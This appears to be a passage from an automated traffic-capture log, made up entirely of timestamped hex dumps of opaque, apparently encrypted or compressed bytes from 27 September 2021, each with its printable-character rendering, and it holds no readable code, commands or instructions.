                                          2021-09-27 15:30:10 UTC34INData Raw: eb 2c a3 88 54 18 f6 50 2a 65 8b ff a1 fa a5 2e cd 53 e8 b9 c5 a7 7c d0 e1 d0 7c a5 7f ae 64 69 e5 19 35 37 a4 b5 78 d9 21 b7 e7 66 9c 2e a5 dd 00 de ee 18 9e fd 36 98 ba ba e4 38 ea 27 21 a0 c2 ae c1 9b 9e c7 56 1c 1b 8c 05 8f d1 04 a1 36 2a 17 aa 7c 97 5b 73 ed 14 5d 29 82 5f c8 ad 11 4a f6 4c 8f ef de e7 0b f2 23 84 63 29 06 8c 30 47 89 8f 3d a5 37 ac c3 ff 96 00 5f d8 a3 df 6f 17 3f a6 b6 3a 50 1c 91 7d 3b a1 40 c9 78 8a f2 38 8a 2c 53 a5 77 e9 9d bf 41 ff 88 bd ce ce 1d 30 87 d8 b6 81 b9 0b ab e8 42 70 06 ce 25 6e 38 36 55 10 4a 21 5c 1a b2 f9 1d fe f7 49 59 47 6d e6 22 b6 79 ff f1 44 e1 3c 96 a5 10 86 36 a8 2e f8 a3 56 bf df cd 64 f5 6c 16 3e fb ff 40 bb b7 43 b6 2e 38 dc 94 52 8d 81 50 aa 5b 01 d5 3b a8 1e 43 1d 83 84 d4 f4 ed 3a 94 2e 24 ad 52 33
                                          Data Ascii: ,TP*e.S||di57x!f.68'!V6*|[s])_JL#c)0G=7_o?:P};@x8,SwA0Bp%n86UJ!\IYGm"yD<6.Vdl>@C.8RP[;C:.$R3
                                          2021-09-27 15:30:10 UTC35INData Raw: 30 f9 d0 de d7 02 ff 9b d3 90 24 1e e1 9d f0 38 46 12 b3 a1 39 dd 8c 8a b5 d3 5d c2 61 25 66 45 d8 29 9f 2a 80 40 8b 12 86 06 83 73 a2 61 8d 49 7a 80 36 73 a6 6c c8 40 cd 05 d5 c1 7a 91 65 0c f1 7b 14 ac d4 1d 2c 97 16 f5 23 9c 88 6f 3d 5b 6c 81 61 f2 c1 fa f3 d8 1c d7 41 57 64 b2 c2 30 fe ac e7 bb 97 7e 07 08 ad 07 c8 90 16 c7 9e dc 3b 3e 24 45 57 74 8f be d2 ca 43 4f 01 bf f2 5d b7 71 81 11 78 dd b7 da 23 ad 15 77 1a 74 18 c2 c4 30 fd fd 29 ce 20 e6 f5 57 ea f3 e2 1c 8f 67 45 62 f5 ec ea 14 ec f4 e8 65 9b c8 9f 67 10 0f e6 fb 61 57 7a 41 d7 ff a9 b4 69 90 72 34 d3 23 fa 2d 71 6f 12 76 c8 d4 d4 2e 40 e9 28 82 9b 6f 85 8c 16 9d 32 cd b6 d1 ae 19 78 b6 74 9d 90 d9 f3 f3 83 63 0c a3 9f 2e 1e 4c 92 f5 12 ce 3a 32 5c 0d fe b7 52 73 ee 07 9b 77 74 86 2b 55 20
                                          Data Ascii: 0$8F9]a%fE)*@saIz6sl@ze{,#o=[laAWd0~;>$EWtCO]qx#wt0) WgEbegaWzAir4#-qov.@(o2xtc.L:2\Rswt+U
                                          2021-09-27 15:30:10 UTC36INData Raw: 9f d9 e9 a8 b6 be 36 83 f4 97 36 c9 28 a7 ed f4 48 d4 a3 8e 5e c2 aa c1 5b 20 46 ca 0b ed 2f a7 a4 3a 1d 78 ed 6d dc 8a ff a1 c4 d6 ba cd 59 c6 bc d6 a6 7a dc b4 b7 7f a5 7d 84 38 3c e5 13 5e d1 d6 b4 72 c0 0e df e0 77 91 14 b6 04 97 6f 96 67 94 fb 23 83 8d 79 47 36 cf 05 02 b3 cb b5 c2 dc f4 c7 56 1c d6 85 3e 86 bf 40 a1 36 20 04 a5 6d c0 70 26 e3 0e 57 3a 8e e4 c7 b9 12 4a f6 42 e2 93 01 d5 24 f2 64 85 63 29 38 8d 23 35 f0 85 2c a8 70 21 c2 ff 96 3c db d1 8b e1 49 15 1d 02 a2 2e 49 3e 2b bc 28 ac d3 fe 78 80 78 4b 9b 04 6f ba 6d cb f8 bf 6b f5 08 dc 8f aa 19 1a 9b da 9e 92 19 08 ab 5c 26 70 06 9f d1 6e 29 20 4f 28 ec 21 5c 1a b2 f1 04 00 f6 65 c6 38 0c e6 04 b2 51 e1 58 45 e7 42 e9 a5 10 82 04 8f 2e f9 ab d6 dc df 49 61 ef 60 55 36 e5 01 86 96 b9 3d d1
                                          Data Ascii: 66(H^[ F/:xmYz}8<^rwog#yG6V>@6 mp&W:JB$dc)8#5,p!<I.I>+(xxKomk\&pn) O(!\e8QXEB.Ia`U6=
                                          2021-09-27 15:30:10 UTC38INData Raw: ce da 12 d4 eb d4 4c 31 74 fd 98 c7 ce 99 66 a3 2f 0d d6 34 15 83 82 bd cb 4d e5 db e2 19 46 db cd d6 18 ff 94 a9 e5 35 1a 6b 02 b1 16 47 14 91 84 e5 c7 9b e0 1d b6 5c c4 6c 57 07 21 d9 2d e1 bb 5e 4a 83 34 5e 05 eb 08 a4 66 e8 c2 72 87 53 ba a1 46 c2 6a cc 14 c9 c1 78 93 63 47 d5 4b 71 a6 da 1d 2c 97 0d c7 27 92 84 0a 48 5b 32 81 61 e3 e9 a5 c0 dc 1a 5c 32 61 65 ff c8 3b e8 90 a9 cb f6 79 2f bb a3 74 ac b9 35 cd 93 df 1b 7c 48 dd 51 5c a1 d1 f0 c1 2c 7f 13 b9 8b 7c 9e 36 88 02 7b e4 0b c9 25 c4 1a 55 1a 7e 03 ef 94 5c d4 fa 01 e0 31 e3 e7 57 fa f3 e2 1c 8b 67 6a 60 f5 e0 d1 a9 ff f1 81 66 b9 c8 95 7e 3f 54 e2 ea 63 69 4f 45 59 42 a9 a2 69 90 72 38 25 72 e8 28 18 23 aa 74 c2 db 93 68 41 e9 28 76 09 66 8c a6 38 b0 5d 9a bc be 9e c4 70 bb 1c a0 dc da f9 df
                                          Data Ascii: L1tf/4MF5kG\lW!-^J4^frSFjxcGKq,'H[2a\2ae;y/t5|HQ\,|6{%U~\1Wgj`f~?TciOEYBir8%r(#thA(vf8]p
                                          2021-09-27 15:30:10 UTC39INData Raw: 21 a3 73 95 c7 c9 5b b3 43 c2 54 a0 61 a3 58 c3 19 29 72 5f e2 ae 1a 4f 63 aa e7 d3 6c 8e de e6 b5 a5 4d 35 d4 a8 9e 21 1b 0d 99 e0 e7 47 bb c4 8a 43 36 bd 77 76 41 4a d4 12 e4 3d b4 89 5a e2 79 cb 4c bf 37 ff ab d8 f4 36 de 5c c0 85 c3 b8 75 28 c8 ce 74 b3 f4 93 43 69 e4 39 45 bf b7 b0 72 db 23 ba 1f 76 b7 33 b6 f2 04 68 81 bb 8d f9 21 9a b9 d5 88 3d fd d3 34 9f c8 a7 da f1 cc d6 53 09 05 7b 15 aa b0 59 b0 32 ae b3 9a 68 67 d7 d9 f2 1a 44 3f 8f 5f c0 dd 4d b4 f7 6a 88 e9 28 b5 2d da 12 eb fe 23 15 96 18 36 5a 7a d3 b3 53 47 c6 ff 8d 11 52 2f 8a cb 69 3c fe 67 aa 3d 46 14 5c a6 22 7a 69 d2 7b 9d eb 2e 9b 15 6e ba 67 1d 42 93 69 d4 8d 85 3d 54 e2 cf 83 b7 65 81 29 01 81 f6 24 58 1d fe d5 6e d0 37 43 10 12 21 5c 0b b0 d1 a4 fe f7 4f d6 35 d7 e6 04 bc 73 f8
                                          Data Ascii: !s[CTaX)r_OclM5!GC6wvAJ=ZyL76\u(tCi9Er#v3h!=4S{Y2hgD?_Mj(-#6ZzSGR/i<g=F\"zi{.ngBi=Te)$Xn7C!\O5s
                                          2021-09-27 15:30:10 UTC40INData Raw: 19 e8 33 47 4d ac e8 b7 0d fe fb 19 40 25 1d cd 8a d6 7a 6d 75 4c 2f 4f 01 54 a5 c8 09 ce db 54 d4 6e 0d 4c de 6c 80 e3 c5 db a9 62 a3 12 16 e6 31 35 b5 82 ac c9 32 ec d9 9c f8 f9 da c7 c6 20 fa 9e fd ae a2 1a 6f 20 b7 53 46 12 b3 a8 88 5f 9d 8f d0 a3 4a ea f9 2d 09 2a b6 3c 94 f6 54 40 5c 30 a8 38 ec 24 a8 75 8d bd 4a 87 59 6c 79 6c c4 40 cd 04 c9 c0 6a 93 65 47 f1 6f 71 b3 f7 1d 22 8d 16 f7 22 81 b8 0b 48 15 67 81 61 a9 c1 e1 d2 ca 0f 53 79 68 65 ff c2 30 fe bd f6 36 f7 53 13 04 a3 5c c0 92 16 cb bb f1 33 3a 41 b2 9b 74 85 db eb d8 46 45 03 bc 9e 70 48 70 a7 17 7b c4 9a a1 26 c2 34 5e 3e 7e 09 cd b3 93 d4 fc 23 db 3d f0 e8 38 d1 f7 f9 e8 8d 63 28 61 dd c9 f9 10 f7 dd 8b 52 89 cd 95 65 12 01 ee 14 64 6d 61 36 e5 48 c6 92 42 8f 68 2c 08 39 fa 2d 02 f5 12
                                          Data Ascii: 3GM@%zmuL/OTTnLlb152 o SF_J-*<T@\08$uJYlyl@jeGoq""HgaSyhe06S\3:AtFEpHp{&4^>~#=8c(aRedma6HBh,9-
                                          2021-09-27 15:30:10 UTC41INData Raw: d2 75 b4 ef 00 1b c5 dc dc 68 7b 29 66 55 65 54 25 f5 9d 30 31 51 3f 00 3d 47 61 5e 13 0d 8b 16 93 de 31 35 07 56 c4 5c 99 34 b2 71 ed 44 0e 72 59 c0 56 d7 4f 69 b1 d4 e8 1f 8d cf e5 c5 31 b2 34 f2 b1 9d 24 e4 28 f1 ee f4 44 93 42 8e 5e c2 ad 72 5b 2f 44 ca 07 8e a5 a4 8c 48 0d 72 f5 6c e4 f2 fc ab d4 d6 b8 cc 59 ca 85 ef 8f 00 d5 c9 e4 10 3d 78 86 49 78 ef 01 73 87 df b6 72 cc 0e 31 e0 77 91 29 9d f2 f2 6a 81 b7 f1 65 3d 89 b6 c4 93 2a c3 05 48 b0 cb b9 e1 63 cd c7 5c 07 21 ad 6a 85 be 56 ce ae 21 04 af 7c 92 3a 0f c5 6b 54 3a 89 66 52 c3 47 40 e7 6f 88 8e 98 d4 2e d0 02 95 6b 34 cf 8f 0b 5d ae bd 5a af 58 54 cb 2f d6 14 4c d0 a3 f3 6f 17 3f 50 d7 2f 43 1e 65 b2 34 84 62 ed 76 98 f5 3a 95 6b 7e a5 77 e9 6b 28 6a ff 82 af 8d 82 84 31 85 d2 66 cb 29 0b aa
                                          Data Ascii: uh{)fUeT%01Q?=Ga^15V\4qDrYVOi14$(DB^r[/DHrlY=xIxsr1w)je=*Hc\!jV!|:kT:fRG@o.k4]ZXT/Lo?P/Ce4bv:k~wk(j1f)
                                          2021-09-27 15:30:10 UTC43INData Raw: bc dc 28 de 23 4c 76 2a 6e 6a 81 f0 80 13 19 61 e1 76 de 32 5d a8 08 14 71 a2 6a b1 06 13 f3 e7 49 65 7a de 9b 04 cc 9d 1c 54 2f 2a fb 99 dc 70 a2 7f 55 09 b1 00 79 a7 d9 0c e6 68 02 d4 e1 5a 63 cf 76 81 f0 c1 df 94 75 a9 2f 07 ec 2e 1f 4b 83 91 c2 26 ad d9 f3 31 e6 d1 de da 13 e9 80 c8 9a cb 1b 43 0b 8e 13 53 3a 3e a9 e7 c1 8b 02 dd b7 5c c3 7f 38 1d 08 7a 29 95 fc 76 5b 82 3e 8a 1c e9 3b bf 72 8d 95 63 8d 40 98 a6 40 d6 62 a2 77 c8 c1 70 bb e3 44 f1 67 1e 0c db 1d 26 9a 0c e4 29 92 99 02 57 43 98 80 4d e9 c7 31 89 dc 1c 57 69 43 64 ff c8 18 9b b9 ec c2 de 6e 07 02 ab 67 af 8e 0f de 99 d5 22 30 54 cb a9 75 a9 ca f6 1b fe 45 12 b8 a9 6f b6 71 81 2a 09 cd b2 c1 0d d3 32 76 10 6d 0c d8 cb 4c de fc 38 ce 2d 1d ec 14 83 e3 e6 3e d6 4f 23 69 b0 eb f9 10 fd 7a
                                          Data Ascii: (#Lv*njav2]qjIezT/*pUyhZcvu/.K&1CS:>\8z)v[>;rc@@bwpDg&)WCM1WiCdng"0TuEoq*2vmL8->O#iz
                                          2021-09-27 15:30:10 UTC44INData Raw: bc f2 b1 8d 2d d2 0b 3d 77 a8 00 38 8c ee 0b fa 64 30 1c 70 5a 51 47 11 69 44 f0 7f 2b c3 78 ca 4e 29 69 c0 cb 00 14 f3 3b 6f 67 b3 5e 37 dc a4 44 23 58 11 49 a9 46 67 3b 88 25 a3 64 83 d4 26 5d 8e 5e ec 34 8b 3e a6 37 4f 30 0d 74 4c e3 d0 d0 5b 9d a1 ec c6 17 1d cf e3 a0 bf 9b 1a f8 a0 9d 20 33 01 e6 c1 d1 53 be f9 ae 76 8f bd 5b 79 46 40 db 08 c9 5e a6 8c 44 73 f2 e6 45 ca e4 67 ab d2 f4 3e c8 71 77 94 c6 a1 69 d0 d8 e8 57 2a 78 86 49 44 a6 02 51 87 2b b4 72 c0 0b 9c f0 71 b7 0e c7 f8 8c 69 87 a2 92 ec 30 98 b6 ba b1 3a ea 2b 24 bf da b4 a6 d0 ce c7 50 07 04 94 12 e9 98 52 a1 30 31 08 8d e2 9b 28 20 82 3e 55 3a 89 48 d4 ce 28 5c f7 46 96 c9 2e d7 2e dc 07 82 bd 2c 30 b4 16 4e a5 8f 3f a1 70 6c c3 ff 96 ca 4c c0 82 f0 b9 04 3c 69 aa 3f 53 2a 7d 5c cb 7b
                                          Data Ascii: -=w8d0pZQGiD+xN)i;og^7D#XIFg;%d&]^4>7O0tL[ 3Sv[yF@^DsEg>qwiW*xIDQ+rqi0:+$PR01( >U:H(\F..,0N?plL<i?S*}\{
                                          2021-09-27 15:30:10 UTC45INData Raw: 5f 98 e9 51 c0 ab c1 b7 dc a5 f5 b1 a6 02 eb 22 42 b4 9c fe e0 3c 72 94 db e5 af d0 6a aa 11 22 cf 3e 51 bf 37 9c 7a a1 f0 95 05 46 9e 1e 83 43 98 4a 7e 1a 16 65 ac 74 b0 82 a4 dd 8b a8 97 7b d9 9d 0d f4 e8 1f 48 2f 35 f5 8a 48 70 b8 dc 4a 17 55 01 55 b4 c8 09 e3 da c5 20 ea d9 56 cf 76 81 f0 f4 c6 99 f8 a3 2f 16 d3 31 15 a4 94 ae cf 26 6a db f3 31 f9 cb c9 c7 ed f9 a6 d4 9e 26 1e 6f 3b 9b 0c b9 13 95 ba e5 49 2a 98 00 a0 8a 4f 40 2c 09 21 d3 30 86 f2 5e 5b 86 25 7e 0e c0 35 a4 69 85 9d e3 84 51 65 29 db 9f fb ac 98 d5 d2 7e 93 74 43 ed 9f 70 80 dd 15 3b 41 1a ea 30 96 88 19 4c 46 98 80 4d f5 c9 e8 f2 08 02 45 45 57 75 fb db ce ee 94 e7 de f4 f1 b0 15 7b 79 a6 8b 05 c9 93 c4 37 20 b5 dc 7b 71 ae 0d eb d8 47 45 03 bd 97 85 b7 5d 88 15 6e c8 b2 da 21 dc cc
                                          Data Ascii: _Q"B<rj">Q7zFCJ~et{H/5HpJUU Vv/1&j1&o;I*O@,!0^[%~5iQe)~tCp;A0LFMEEWu{y7 {qGE]n!
                                          2021-09-27 15:30:10 UTC47INData Raw: a3 ba 32 3d 13 32 e6 8c 87 80 f4 3b 57 22 6a 6b e5 f2 3a e8 dd eb d2 d0 6a c4 8a ff 8e 2b bf b1 89 58 5c 0a 3c 66 f7 8f 39 d0 e4 23 4c 3a 30 1a 72 2c 95 d4 11 63 44 e5 07 12 d3 7f a1 ee 3f 6b c6 da f2 5e e0 28 60 77 6c 5c 37 da da 85 32 51 33 f6 a4 63 49 63 02 24 a9 6e b8 e6 37 5a 95 89 c4 50 f6 11 a1 58 c1 19 1a 70 5f ee e9 8f 4c 63 a6 d5 d9 6b 8e c9 8c 6c a9 b3 3e 26 ae b2 1e fa 00 86 e7 f9 6a 83 d5 8f 54 16 bc 5d 59 56 5b ca 01 e1 3d a3 8c 5e 3e 78 e9 5f cc 8b fe ab d2 ce 2f d1 15 c0 9a dc a7 7a d7 d2 d2 7c a5 25 86 43 69 bb 13 5a be d7 0f 72 ca 2c ac e7 09 ab 39 b4 de a6 7e 83 b1 98 d5 67 8a bc d3 b1 20 e8 2d 33 dc 0d bf c9 fe 12 c9 73 3e 3f 85 14 8c b2 78 99 36 20 0e 7b 6d 9e 56 16 ec 14 53 12 98 4c c5 c4 6f 11 f5 46 9a c9 19 d7 2e dc 7b 42 63 23 1f
                                          Data Ascii: 2=2;W"jk:j+X\<f9#L:0r,cD?k^(`wl\72Q3cIc$n7ZPXp_Lckl>&jT]YV[=^>x_/z|%CiZr,9~g -3s>?x6 {mVSLoF.{Bc#
                                          2021-09-27 15:30:10 UTC48INData Raw: 23 31 eb 19 c5 e2 eb 87 1a 1b c2 fc 01 f1 94 5a 5c 4c 93 97 8c 89 b1 0d 43 82 22 db 11 58 89 ee 51 51 ab c1 b7 e3 e4 7f b0 a0 1b 8c 75 4c 91 be da e5 14 d6 84 d5 cb e4 54 6b a0 c5 2a cf 37 6e f2 24 90 61 85 4e 85 3b bc 48 7a 7c 52 83 75 34 09 07 7e 95 f0 a2 0c 19 8d 58 57 68 8e b0 30 0c f4 e2 09 3b a7 34 f5 80 b9 f9 b2 75 40 16 4b 09 44 b0 e0 92 ce db 08 fc 41 d5 4c c9 5e 1b e3 c4 ca b1 fa a3 2f 1c ed 36 3d 84 82 bd c1 27 33 db f3 31 fe a9 40 d1 13 fe 99 d9 58 21 3f 47 1d 9f 14 4d 01 b6 ac ea ef a5 8f da bd 81 78 6b 2c 09 31 d7 01 3e f5 5e 4c ed b9 81 0f ea 09 a0 67 ad 83 63 89 36 ee a6 6c c4 7d 17 17 de d2 6a ab e9 47 f1 61 60 a2 cb 0d 3b f8 9f f6 23 94 9b 19 59 55 77 91 7b 9d 48 e0 c3 da 0f 45 50 59 75 ef db 5f 66 b9 ec ce e5 6d 16 13 89 fb ab 91 1c e0
                                          Data Ascii: #1Z\LC"XQQuLTk*7n$aN;Hz|Ru4~XWh0;4u@KDAL^/6='31@X!?GMxk,1>^Lgc6l}jGa`;#YUw{HEPYu_fm
                                          2021-09-27 15:30:10 UTC49INData Raw: a4 f0 eb 21 4a 83 c5 ae 57 aa 51 6e f7 33 bf 40 30 32 91 d0 b2 b7 2b 56 d9 bf 06 0e ba 17 93 34 23 0f 70 f7 8c b2 88 fe a7 46 24 75 67 f3 72 09 ee cc fa c4 4c 7a c2 95 c3 98 ab e2 b7 98 4f 4a 96 2c 7b d8 82 2f 10 f5 25 53 6b 26 86 72 59 24 a7 3c 68 4e e9 74 34 c5 10 8f c7 28 63 cf cb b5 2e e2 28 6c 56 77 59 58 1b b4 43 38 5d 11 bf aa 46 6b 5c 16 0c 1e 61 90 d8 2e d7 98 57 c4 57 9b 39 b1 5f d3 33 af 63 58 ff d7 5a 70 63 a0 fc 62 78 89 d7 e1 24 1e 3f 0b f8 a0 96 94 dc 07 95 e5 e5 4a af c1 96 d3 e7 bc 5b 72 44 4e db 08 f7 2a 39 9d 4b 0b 6e 7b 54 c5 93 e9 37 c3 f7 07 6e 59 c0 9e d7 ae 6c 46 e5 c3 6e ad 6f 1c 6b 78 e5 13 50 7f b6 b5 72 d1 0e b2 e1 77 91 10 80 db 8e 63 f5 a3 9e fd 27 77 b7 d5 99 4c f8 2d 35 a8 a4 aa c8 f4 c6 d4 52 07 0c 91 3c 38 bd 50 a7 21 ad
                                          Data Ascii: !JWQn3@02+V4#pF$ugrLzOJ,{/%Sk&rY$<hNt4(c.(lVwYXC8]Fk\a.WW9_3cXZpcbx$?J[rDN*9Kn{T7nYlFnokxPrwc'wL-5R<8P!
                                          2021-09-27 15:30:10 UTC50INData Raw: ef 35 70 11 a3 ab c5 dc 5f c5 f8 01 51 31 e3 e7 2b c8 e3 ea 3e 4d 4c 23 65 dd 2c f8 10 f7 d9 4c 4f 9a c2 fa b8 16 1e eb f9 63 48 43 d9 59 48 cc b0 7e 92 78 39 1e 3e fa 2f 33 0c 15 7d 1f b4 b9 4b 41 ff 33 58 52 bf 9f b2 03 9f 65 a3 b4 d1 a4 d4 78 99 d9 8b 91 df d1 18 80 63 0a b3 88 06 e3 4e 92 b6 05 59 3a 32 52 0c ed a4 43 62 f8 16 96 8b 0a 95 4e 1c 21 b0 9c 32 21 9a 74 ea e1 29 89 60 7b 58 00 99 73 4d 0d 1d bf 46 0f 23 0c 15 b9 ec 69 1f b0 93 c3 bd 2e c1 41 68 eb 36 2e 40 3b 3d af 8f a0 b1 31 57 c8 a9 00 13 ad 98 96 23 29 0f fa 6a b5 ad 81 e9 99 46 36 7e 79 f1 c6 bb e8 d3 fb c6 f8 a8 c7 8a c9 99 ba f4 b1 87 43 4f 1f 2c 68 d1 9b b5 b3 e4 23 4d c6 21 0f 77 4b 3b fc b2 69 4e e9 6d 15 11 7c a5 c0 3f e4 c1 dc da 06 f0 3e 77 49 62 49 bb e3 b5 43 33 f3 28 3e be
                                          Data Ascii: 5p_Q1+>ML#e,LOcHCYH~x9>/3}KA3XRexcNY:2RCbN!2!t)`{XsMF#i.Ah6.@;=1W#)jF6~yCO,h#M!wK;iNm|?>wIbIC3(>
                                          2021-09-27 15:30:10 UTC51INData Raw: f5 18 83 2a 5d a0 85 3d a9 41 aa c2 d3 99 02 46 cb 98 e2 6f 06 30 63 5d 2f 6f 1c 75 08 34 84 68 e2 6b 8f f8 3a 9e 1a 95 a4 5b d1 4b bd 62 e5 e7 52 8f aa 17 2f 95 f0 99 80 29 01 a8 ee 31 1f e9 ce d1 64 10 e3 42 10 40 40 74 c9 b3 f9 17 d6 23 48 dd 4c 45 c2 04 b6 73 f3 44 4c f2 39 8b b4 15 99 25 56 2f d5 a9 50 a8 09 43 7a ff 7f 50 3e ea fa 9d 44 b6 6f bd 38 3a b3 5d 52 8d 8b 47 70 48 05 d8 20 bb 1b 8e 0d 86 98 e7 f4 c1 36 9d 2c 4b 64 48 33 51 3a 4b bd 59 df 06 31 71 6d 80 c1 89 44 24 56 b2 ad c7 88 d1 39 41 c1 fa 09 41 77 0b c0 e8 f2 aa 5c e6 c3 d6 20 42 ba 58 56 62 03 8e 9f 86 99 89 46 9d 23 4a a5 75 80 ed 2f d2 9b 7c a2 f8 98 f2 b1 b1 14 f5 02 4c bd b7 de f3 39 78 96 d0 d2 9b 2e 6b 8c cd 09 db 0a 40 96 db 6f 63 87 f2 b6 3f ba 84 e0 7c 52 e6 5d a8 18 11 67
                                          Data Ascii: *]=AFo0c]/ou4hk:[KbR/)1dB@@t#HLEsDL9%V/PCzP>Do8:]RGpH 6,KdH3Q:KY1qmD$V9AAw\ BXVbF#Ju/|L9x.k@oc?|R]g
                                          2021-09-27 15:30:10 UTC52INData Raw: 10 a2 21 d4 33 30 3f cf 57 74 9e c2 f7 da 45 6d ce ba 81 7d d9 c3 8a 02 77 b8 a0 cb 25 d9 21 7e 08 76 18 cf 52 e8 c3 26 01 c2 31 e3 c6 29 c7 e3 ea 3e 6c 4f 23 65 e6 ef 8a 32 ff f1 81 5d 90 d9 9f 65 12 36 3f ea 65 47 04 6d 5b 48 c0 89 62 81 73 50 29 3b eb 2e 0f 01 02 7f ad fb b9 4b 47 f8 28 76 98 66 8c a6 7f be 5f 9a b0 0f a8 ed 47 b1 1b 82 b9 e1 f9 d9 89 bd 0c b3 8e 39 c8 5d 9f a1 1f c5 6b bc e5 32 cd 48 ad 8e 30 1c be 3e 2c 86 21 5f 33 bc e5 9b 2d 8b 72 f7 53 1d 98 6c 66 1c 11 9a 2a bc 26 5c f5 55 06 32 05 04 b5 f0 f3 37 d6 89 c3 b7 41 17 40 68 ed 31 23 51 36 33 87 4c a2 b1 37 40 45 f1 00 13 ac 22 82 32 3d 11 ed e6 8a a1 81 e8 3b 4d 22 6a 6c e5 ee 18 e8 d5 f1 d2 d0 4a c5 8a cf a9 36 f3 b1 92 42 5c 0a 27 7d c7 8d 2a bc e7 23 51 65 30 1a 11 5f 2f c5 07 7a
                                          Data Ascii: !30?WtEm}w%!~vR&1)>lO#e2]e6?eGm[HbsP);.KG(vf_G9]k2H0>,!_3-rSlf*&\U27A@h1#Q63L7@E"2=;M"jlJ6B\'}*#Qe0_/z
                                          2021-09-27 15:30:10 UTC54INData Raw: 36 20 0e ae 45 a0 28 26 e7 ca 55 3c a5 49 ef c2 47 0b c2 46 9c e3 00 d5 2e 8c 14 84 63 69 14 9c 21 ee a4 85 2c ba 58 54 c3 ff 9c 14 4c d1 8b e7 6f 11 35 78 a3 ed 42 14 4d 6a 35 84 68 eb 78 8a f8 31 9b 04 6a be 47 e6 43 d7 6a ff 88 c8 8f aa 0c 43 3f d8 b6 8b 23 23 45 eb 26 76 0a b0 ed 6e 38 3c 4b 7f fa 20 5c 10 bf f0 72 4f f6 49 d7 55 61 f0 17 bd 41 ea 5a 45 e1 2d 87 b4 1b 1c 3f ac 27 e8 a5 39 0f de 49 6f e6 69 44 3b d6 fa 5a 4f b7 43 b2 3f 3d f4 7b 51 8d 87 3f 18 5a 01 df 13 34 1e 8e 16 90 82 08 f3 c5 b5 9a 2e 2e 81 4d ee 8f 08 de a0 5b df 2e d0 77 70 78 af 17 40 32 56 84 22 c2 88 ca 2f 5c 2e f1 34 47 47 8f c6 e8 e5 c0 f6 19 c2 f0 01 f6 94 5a 5c 75 09 bf ff 82 99 9e 50 85 39 b1 8c a8 8a e4 38 b9 18 c0 bd fe a3 6b b1 a0 1b f0 f4 5c 97 9c 2c e3 3c 7e 96 d0
                                          Data Ascii: 6 E(&U<IGF.ci!,XTLo5xBMj5hx1jGCjC?##E&vn8<K \rOIUaAZE-?'9IoiD;ZOC?={Q?Z4..M[.wpx@2V"/\.4GGZ\uP98k\,<~
                                          2021-09-27 15:30:10 UTC55INData Raw: 53 77 87 0e d6 c3 e1 c5 c3 3f 45 53 57 75 ed dd 11 11 b9 c0 c4 e7 77 0f 6d 89 76 aa 97 09 ef 80 c7 33 2b 59 c2 46 8a 84 fd ed da 48 52 9f e6 81 7b b7 62 84 13 72 da ad f6 b8 d3 3d 19 53 7f 09 cd cf 55 cb ee 3a d6 31 f2 ff 27 df 0c e3 3a 83 5e 33 72 e4 68 4e 2f 9b 0e 78 b1 85 e8 86 66 17 0f f3 f6 9b 40 47 4f 27 db c6 98 62 83 7d 22 1e 2b eb 39 0c 14 1f 88 c3 f1 a6 5a 46 fe af 01 45 65 8d b3 1f 85 52 8c a9 ea 39 d4 7f de 52 89 91 d3 ea d0 9c 6e 1f b0 83 3f 0c 51 99 4e 13 f8 6e 23 5c 1c f3 2d 41 76 f1 05 88 04 1b 97 33 4a 3a 4e 97 0d 26 a3 79 f8 7b 23 8b 69 73 d9 00 8e 00 aa 1e 02 b0 ab 07 1e 02 12 a6 fb ec 3d c5 80 c3 a6 53 29 5d 96 ec 09 29 40 3c 3e 1d 5f a5 ae 29 53 57 ae 11 01 b3 ae 7c 33 11 15 ea f7 82 c2 97 e9 3b 5d 3d 4c 7e f7 ee 09 fa cb 0f d3 fc 72
                                          Data Ascii: Sw?ESWuwmv3+YFHR{br=SU:1':^3rhN/xf@GO'b}"+9ZFEeR9Rn?QNn#\-Av3J:N&y{#is=S)])@<>_)SW|3;]=L~r
                                          2021-09-27 15:30:10 UTC56INData Raw: 96 8f 83 02 c3 76 ad dc 8e ee f9 24 24 ba da ac f7 57 31 38 a9 c8 1d a0 3c b1 be 50 ab 25 32 77 1f 6d 98 22 2b c5 2c 57 3a 85 90 c7 c4 6d 43 dc 46 dd fd 00 d5 2e da 14 84 42 23 15 9c e4 4c a5 85 ca ae 58 54 d6 ff 9c 14 56 d1 8b e6 74 27 32 78 20 2c 43 14 37 a3 34 95 1b 44 78 8a f2 21 b3 5f 6b a5 71 8c a7 be 6b f5 9b b9 f1 96 1d 30 8f d5 9e af 2b 0b ad e4 58 4c 06 ce db 46 35 32 43 16 25 91 5d 1a b8 f4 14 91 46 48 dd 4c 7e e3 0d d9 46 ff 5b 4f f0 39 98 b3 06 95 39 90 3b fb a1 56 ae c9 58 70 6f 7f 5a 16 f5 fb 87 bc a6 4c 9a 0a 38 dc 9e 7a 82 85 50 ac 73 2f d7 3b ae 36 6b 1d 83 8e 31 69 ed 3a 91 3d 28 bc 44 5c bf 09 de aa 59 dd 17 2c 1b b9 7e c0 af 2d 11 5c ac be c2 88 c0 2c 16 64 d3 b4 42 6f 12 72 ff 35 22 51 18 c2 fb 3a 67 bf 1c 47 74 1e 90 9b ab 7f 99 43
                                          Data Ascii: v$$W18<P%2wm"+,W:mCF.B#LXTVt'2x ,C74Dx!_kqk0+XLF52C%]FHL~F[O99;VXpoZL8zPs/;6k1i:=(D\Y,~-\,dBor5"Q:gGtC
                                          2021-09-27 15:30:10 UTC57INData Raw: 5f 09 8d 6e c2 6c cb 15 c0 ae 6c 92 65 4d 2f 6e 54 84 ed 1d 2c 9d 05 fd 0b aa 88 08 42 85 66 5f 74 d7 e9 d6 c3 dc 16 45 4a 24 de ff c2 3a e4 90 d4 c8 f6 75 d9 00 a7 5e ad bb 16 cd 93 94 07 3a 4b dd 57 74 85 6a f0 cb 43 01 12 b9 81 84 b6 71 8b 0d 7d cc b2 d1 25 c2 33 76 1a 7e 09 c1 dc 5f d4 f6 28 c4 31 f3 ec 38 c0 e7 e2 16 8c 55 23 63 f4 fd c9 14 fd 9e 85 4e 9a b4 95 74 06 6d 5b ea 65 4b 61 6d 77 4a c6 9e 64 e3 63 3e 0d 3f e0 00 3f 0f 13 70 ea fe bb 4b 4b c1 00 5a 45 63 a4 84 10 94 57 b2 87 d1 a4 cf 5c ad 1c a0 b0 dd f9 df ab 40 0c a2 89 06 3c 4a 92 b6 3a f0 65 32 58 62 e2 b6 52 77 c5 0f e8 ac 1b 86 2b 7f 27 df 21 20 2d 81 17 44 7a 25 92 7f 65 fa f1 9d 00 bb 1e 14 91 ec 07 32 0f 17 b1 85 d1 35 d6 94 d0 b2 46 27 44 07 57 24 23 5b 59 57 86 4c a9 de 48 41 45
